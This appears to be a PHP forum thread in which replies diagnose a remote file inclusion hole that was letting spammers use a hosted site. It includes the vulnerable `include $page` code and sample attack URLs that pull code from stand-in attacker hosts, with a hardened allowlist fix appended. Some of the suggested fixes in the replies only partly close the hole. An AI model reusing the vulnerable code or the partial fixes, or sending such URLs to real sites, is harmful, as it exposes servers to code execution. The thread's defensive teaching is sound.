
[Resolved] Is this an exploit?


Pixelsize

Recommended Posts

Hi there, I think this is the place to post this question.

At the web hosting company I'm with, they keep suspending my web page because my code is vulnerable to attacks. This is the code:

[code]<?php
// Security patch against spam exploit
// Provided by TangoWebs
// Rejects the request if any POST value carries a mail-header fragment
$badStrings = array("Content-Type:", "MIME-Version:", "Content-Transfer-Encoding:", "bcc:", "cc:");

foreach ($_POST as $k => $v) {
    foreach ($badStrings as $v2) {
        if (strpos($v, $v2) !== false) {
            header("HTTP/1.0 403 Forbidden");
            exit;
        }
    }
}
?>
<title>Heh I didn't wanna show the site's title xD sry xD</title>
<link href="style.css" rel="stylesheet" type="text/css">
<?php
// Variables
$page = isset($_GET['page']) ? $_GET['page'] : ''; // Page name taken straight from the query string

// Display
include "header.html"; // Shows Header

if ($page == "") {
    $page = "home";
}
$page = $page . ".html";
include $page; // Includes whatever file the ?page= parameter names

include "footer.html";
?>[/code]

TangoWebs is the name of the web hosting company... they provided this code and asked me to put it in, and they say hackers are still sending e-mails, mail bombing, or whatever... from my website. This is just one page, but they are all exactly the same; the only thing that changes is which directory to include. Thanks for your time, I hope someone can see what I still can't. Cya!!  :D

Would need to see the code for generating the e-mails, how the user submits the content for the e-mail, and any associated login stuff (like if the user must be logged in and a session is created).

The only thing I could suggest in this little lot is this.

Record the IP address the request originated from and store this in the database along with the time of the request. Each time the script runs it should check the IP address against the database and, if there is not sufficient time between the last e-mail and now, deny the request.

I think a 10 minute interval would be sufficient.....

No login, no forms... this is all... They say they won't reactivate my account until I can ensure that the code has no security holes :S So I can't do tests... But do you think anyone could just send e-mails by taking advantage of... what? A $_GET???

Well, in that case the only vulnerability is the include $page bit.

Say someone had a page they had written to send out mass e-mails and it was located here:

http://www.dodgeysite.com/email.php

They could use your page to exploit that by simply setting page=http://www.dodgeysite.com/email.php in the URL.

On my sites I always use a control on includes that are driven by the user's input.

My includes always look like

include($_SERVER['DOCUMENT_ROOT'] . $page);

That way the file being included MUST reside on your domain.

This code here is very vulnerable!
[code]if ($page == "") {
    $page = "home";
}
$page = $page . ".html";
include $page;[/code]
A malicious attacker can put something like this:
yoursite.com?page=http://attackersite.com/badfile.html
Now within that badfile the attacker made there could be PHP code which would not only affect your account, but everyone else's account on the host's server, and cause havoc with the database.

So what's the way around this? Validate the user input. Before you include, make sure:
- the page variable doesn't hold URLs - preg_match can help you there
- the file you are going to be including actually exists on your site - file_exists can help here too

With file_exists don't do this:
if(file_exists($_GET['page']))

Append your site's document root to it like so:
if(file_exists($_SERVER['DOCUMENT_ROOT'] . $_GET['page']))

Never use raw _GET or POST'd data! Always validate and verify user input.
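The two replies above both point at the same fix: never hand `include` a name built from `$_GET['page']`. Below is an added example of a hardened replacement for the original dispatcher; it is not code from the thread or from TangoWebs. It assumes the page fragments live in a hypothetical `pages/` directory next to the script and that the valid page names are known in advance, so they can be listed in an allowlist. The `resolvePage()` function name, `PAGE_DIR` and `ALLOWED_PAGES` are names chosen for this example.

```php
<?php
// Added example (not from the thread): safe replacement for `include $page`.
declare(strict_types=1);

// Hypothetical directory holding the includable page fragments.
const PAGE_DIR = __DIR__ . '/pages';

// Explicit allowlist of page names. Everything not listed is refused,
// which covers URLs (http://...), traversal (../), null bytes and
// stream wrappers (php://, data:) without any pattern matching.
const ALLOWED_PAGES = ['home', 'about', 'contact'];

/**
 * Turn a user-supplied page name into a file path that is safe to include,
 * or return null when the request must be refused.
 */
function resolvePage($requested): ?string
{
    // ?page[]=x arrives as an array; treat anything that is not a plain
    // non-empty string as a request for the default page.
    $page = (is_string($requested) && $requested !== '') ? $requested : 'home';

    // Defence 1: the allowlist. Strict comparison, so "0" or "home " fail.
    if (!in_array($page, ALLOWED_PAGES, true)) {
        return null;
    }

    // Defence 2: confirm the resolved real path still sits inside PAGE_DIR.
    // Redundant while the allowlist is a fixed list, but cheap insurance
    // if someone later loosens it to a regex or a database lookup.
    $base = realpath(PAGE_DIR);
    $path = realpath(PAGE_DIR . '/' . $page . '.html');
    if ($base === false || $path === false) {
        return null; // directory or page file does not exist
    }
    if (strncmp($path, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null; // resolved outside the page directory (symlink, traversal)
    }
    return $path;
}

// Dispatcher: the only place include is called, and never with raw input.
$path = resolvePage($_GET['page'] ?? null);
if ($path === null) {
    http_response_code(404);
    echo 'No such page.';
    exit;
}
include 'header.html';
include $path;
include 'footer.html';
```

With this in place, `?page=http://www.dodgeysite.com/email.php`, `?page=../../etc/passwd` and `?page=php://input` all fail the allowlist check before any filesystem or network call is made, while `?page=about` includes `pages/about.html`. Two caveats on the thread's own suggestions: prefixing `$_SERVER['DOCUMENT_ROOT']` stops remote URLs but not `../` traversal to other files on the same host, and `file_exists()` on the prefixed path has the same gap, which is why the example checks a fixed allowlist and the resolved real path instead. On current PHP a remote include also needs `allow_url_include=On`, but relying on that setting is no substitute for refusing the input.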

[quote author=wildteen88 link=topic=99803.msg393230#msg393230 date=1152296362]
Append your site's document root to it like so:
if(file_exists($_SERVER['DOCUMENT_ROOT'] . $_GET['page']))
[/quote]
That's really useful, thank you :)
